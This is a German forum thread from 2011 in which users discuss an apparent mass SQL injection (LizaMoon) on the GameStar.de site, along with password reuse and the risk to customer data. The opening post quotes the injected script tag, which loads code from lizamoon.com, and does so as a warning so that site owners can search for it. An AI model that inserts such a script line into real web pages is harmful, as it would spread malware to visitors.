# GameStar.de zwischenzeitlich Opfer einer SQL Injection Attack?



## Ob4ru|3r (29. März 2011)

Die Website des Computerspiel-Fachmagazins "GameStar" wurde am heutigen Abend scheinbar Opfer einer sogenannten "SQL Injection/Insertion Attack", sprich: Es wurde externer (Schad)Code in die SQL-Datenbank der Gamestar Website eingeschleusst.


Geäussert hatte sich dies am frühen Abend ab etwa 19 Uhr, wo der Link zur grade veröffentlichten Newsmeldung zum kommenden potentiellen Modern Warfare 3 in der News-Sektion der Gamestar.de-Seite zu Warnungen im Header des Browsers führten, welche vom Security-Filter der Gamestar-Website ausgegeben wurde ("999 Possible Attack Detected"), mit der verqueren URL_:

http://www.  gamestar.de/spiele/call-of-duty-8%3C/title%3E%3Cscript%20src=http://lizamoon.com/ur.php%3E%3C/script%3E%3C/title%3E%3   Cscript%20src=http://lizamoon.com/ur.php%3E%3C/script%3E/news/call_of_duty_modern_warfare_3,466  50,2321907.htm _

(Lücken wurden eingebaut, damit niemand versehentlich draufklickt, ältere oder andere Browser als der FF4 könnten die URL ja evtl, auch nicht automatisch blocken), sofern man sich die Mühe gemacht hat sich den Quelltext der Gamestar-Website zu durchfosten stiess man urplötzlich auf dutzende Einträge der Internetseite "lizamoon.com/ur".




Eine kurze Webrecherche ergab, dass es in den letzten paar Tagen scheinbar zu einer Flut von derartigen Injection-Attacken auf SQL-basierte Internetseiten kam, alle mit dem selben Eintrag 

</title><script src=http://lizamoon.com/ur.php></script> 

IP-Tracking weisst dabei auf Server in Russland hin. Es empfiehlt sich daher - sofern man Besitzer einer auf SQL-Datenbank basierenden Website ist - diese einmal nach diesem Code-Schnipsel zu durchsuchen, zumal noch nicht bekannt ist wie genau der Code eingeschleusst wurde.


*EDIT: Die IP von der das Script scheinbar stammt, bzw. von der wohl Code nachgeladen werden sollte gehört scheinbar zu einem ganzen Block von Malware-Adressen, deren primärer Zweck es zu sein scheint als Virenschleuder im Netz aktiv zu sein: http://blog.dynamoo.com/2011/02/evil-network-voejkova-nadezhda-voejna.html
* 

Das Resultat des Ganzen war, dass die Website der GameStar zwischenzeitlich wegen "technischer Störungen" nicht mehr erreichbar war, inzwischen lädt die Internetseite aber wieder normal, und auch die erwähnten fremden Segmente scheinen entfernt.

Quelle: Diskutiert wird diese Attacke auf etliche Webseiten u.a. hier: http://forums.asp.net/t/1667041.aspx/1/10?Re+LizaMoon+actack+who+know+about+this+


----------



## Gelöschter_Account_0001 (29. März 2011)

Ja ich habe das heute auch bemerkt das Gamestar nicht erreichbar war.
Eine Warnung habe ich glaube ich nicht gesehen, nur ein nicht erreichbar.

Ich kenne mich da nicht so aus, hat man sich ein Virus oder ähnliches eingefangen wenn man versucht hat die Seite zu erreichen ?


----------



## Ob4ru|3r (29. März 2011)

Mh, also ich hab grad mal meinen PC durchleuchtet (bzw. macht der selber permanent), und bisher hat nix angeschlagen. 


Scheinbar hat der Browser (FF4) das auch entweder direkt abgefangen, oder das Script hat nicht so funktioniert wie gedacht, mehr als 'ne blanke Seite bekam ich nämlich nicht.


----------



## kleinerSchuh (29. März 2011)

Spielemagazin mit *? Ach ja, ist lange her. Da wurde der wichtige Teil des Core Team`s aber zu schnell ausgetauscht. Seit Jahren kein Thema mehr.

Stalker wurde in der Roh Version, auch mit Kritik versehen. Unter anderem wegen der langen Entwicklungszeit. Ein Pc Action oder Pc Games Redakteur sagte so was wie, "vielleicht wirds fertig wenn die weniger Vodka saufen". Prompt wurde die erste auffindbare Leiche mit "To ter Deutscher Dummschwätzer" oder so betitelt, (ist mit Patch wieder raus).

Vielleicht gabs ja wieder so einen Kritik Fall. Oder das hat nix mit den Russen zu tun.


----------



## Ob4ru|3r (30. März 2011)

kleinerSchuh schrieb:


> Vielleicht gabs ja wieder so einen Kritik Fall. Oder das hat nix mit den Russen zu tun.


 
Och, mit Russen hat's wohl schon zu tun, da die IP(s) der Seite Richtung Russland führen, wie man meinem Edit entnehmen kann gehören zu der IP, vielmehr zu dem IP-Block aus dem diese stammt, eine Unzahl an Adressen deren primärer Sinn es ist Malware zu verbreiten oder durch Phishing Leute zu ködern. Scheint einfach eine professionellere Abzock-Bande zu sein.


----------



## kleinerSchuh (30. März 2011)

From russia with love. Mann läuft... Peng [Rot Werd, fantastische Musik & super Intro beginn...]  Bond übernehmen Sie.
Angenommen jemand von wo anders geht nach Russland & dann W-Lan. Bekommt der dann nicht auch Russian IP(s)?

Die sind aber natürlich nicht ganz unbelastet was die Hacks angeht.

(Check die Erstellungs Zeit des Posts, eine Null zu viel)

[An System Admin. Eigelogt zeigt das System eine andere Uhrzeit an, als ausgelogt?]


----------



## McBlack (30. März 2011)

Der Browser hat mit dem "999 Possible Attack Detected" nichts zutun, diese Meldung wird immer dann angezeigt, wenn ein Angriff vom gamestar.de-Filter erkannt wird. Der SQLi-Bot hat einfach irgendwo ein JavaScript-Schnippsel eingefügt und da plumpes JavaScript oder auch HTML in der URL erkannt wird, kommt eben diese Meldung.

Viel wichtiger ist die Frage, ob die SQL-Injection schon vorher ausgenutzt wurde, um z.B. Benutzerdaten auszulesen. Die kompletten Userdaten inkl. E-Mail-Adresse und Passwort-Hash sind für Kriminelle eher interessant. Kann aus dem Hash via Rainbow Table das Passwort ermittelt werden und benutzt der User das Passwort auch für andere Seiten (WebMailer, Paypal, eBay, Facebook, Twitter, etc.) so kann er Opfer werden ohne es zu merken.


----------



## Ob4ru|3r (30. März 2011)

Aha, vielen Dank für die Aufklärung, hatte die Meldung halt das erste Mal im Browser gesehen und hatte mich "gefreut" ob's vielleicht 'ne neue Funktion vom Feuerfuchs sein könnte ...



Und naja: Man sollte eh überall jeweils ein anderes Passwort benutzen, maximal mein Passwort auf Gamestar.de könnte ich mal aktualisieren. Was mich jetzt eher stören würde wäre dass die Leute vom Gamestar-Aboservice meine Kreditkartendaten haben .. wobei das über nen anderen Server abgewickelt werden dürfte als die Hauptseite, oder?


----------



## McBlack (30. März 2011)

Als Penntester (ich schaue wer wo gepennt hat  ) habe ich mir, nur so aus Spaß, auch die Seiten vom IDG-Verlag angesehen und dabei kam manchmal diese "999 Possible Attack Detected"-Meldung, allerdings nur zu meiner Belustigung, denn der Filter erkennt nicht alles...  Und ja, ich habe meine Funde immer an IDG weitergeleitet, aber... Naja, das übliche halt.

Wenn Du für verschiedene Dienste verschiedene Passworte benutzt, dann bist Du eine der wenigen Ausnahmen. Die meisten User benutzen ein Passwort für viele, wenn nicht gar für alle Seiten und ändern dieses meist über viele Jahre nicht.

Wo GameStar die Daten der Kreditkarte speichert weiß ich natürlich nicht, aber ich behaupte mal (die Verantwortlichen mögen mir widersprechen) dass sie in dem gleichen Datensatz gespeichert werden, wo auch die anderen Kundendaten zu finden sind. Hierbei hoffe ich mal, dass die Sicherungsnummer nicht auch darin gespeichert wird und Du sie jedes mal neu eingeben musst. Wenn der Aboservice online verwaltet wird, also auch via Internet der Datenbankserver erreichbar ist... besteht durchaus die Gefahr... Aber wie gesagt reine Spekulation. Aufklärung kann hier nur GameStar selber liefern.


----------



## Ob4ru|3r (30. März 2011)

Och, ist eigentlich gar kein so grosser Aufwand ... wo ich mich eher selten anmelde sorgt die stählerne Faust des Zufalls nach mehrmaligem Kontakt mit dem Tippbrett für ein akzeptables Passwort, diese teils recht langen, vollkommen zufälligen Folgen von Sonderzeichen, Zahlen und gross/klein geschriebenen Buchstaben werden per C&P in eine eigene Textdatei gespeichert und bei Bedarf wieder hervorgeholt, alle diese Erinnerungs-Dateien (inkl. verwendeter EMail-Adresse und Username) befinden sich in einem verschlüsselten Container dessen ziemlich langes Passwort ich mir wirklich eingeprägt habe, damit da niemand unbefugtes drankommt, lediglich die Passwörter für PC/Laptop, sowie meine 3 wichtigsten EMail-Konten und ein paar häufig benutzte Dienste (Steam, Onlinebanking, PayPal) kann ich wirklich auswendig, der Rest wird über das beschriebene C&P abgewickelt, fahre da auch seit Jahren absolut sicher mit, und soviel Aufwand ist das jetzt wie gesagt auch nicht. 

Nützt natürlich alles nix wenn Unbefugte Zugriff auf Datenbanken im Netz erlangen ... imo gehört da der ein oder andere Webmaster bei IDG zur Motivation mal ausgepeitscht.


----------



## McBlack (31. März 2011)

Deinen Ursprungspost hast du editiert:
"...Warnungen im Header des Browsers führten, welche vom SQLi-Bot der Gamestar-Website ausgegeben wurde..."

Es müsste aber heißen:
"...Warnungen im Header des Browsers führten, welche vom Security-Filter der Gamestar-Website ausgegeben wurde..."

Denn der SQLi-Bot ist der Robot vom Angreifer, der einfach Lücken zu SQL-Injection sucht und die Injektion vornimmt.


----------



## Ob4ru|3r (31. März 2011)

Fixed, will da ja nix falsches stehen lassen. = )

Aber wer weiss was die (bestimmt sonst gelangweilten) Webmaster von IDg sonst so in ihrer Freizeit treiben, die könten ja auch ab und zu ihren Spass haben. ^^


----------



## McBlack (1. April 2011)

Nun ist der Angriff auch bei Heise angekommen:
Hunderttausende gehackter Webseiten sollten Scareware verbreiten


----------

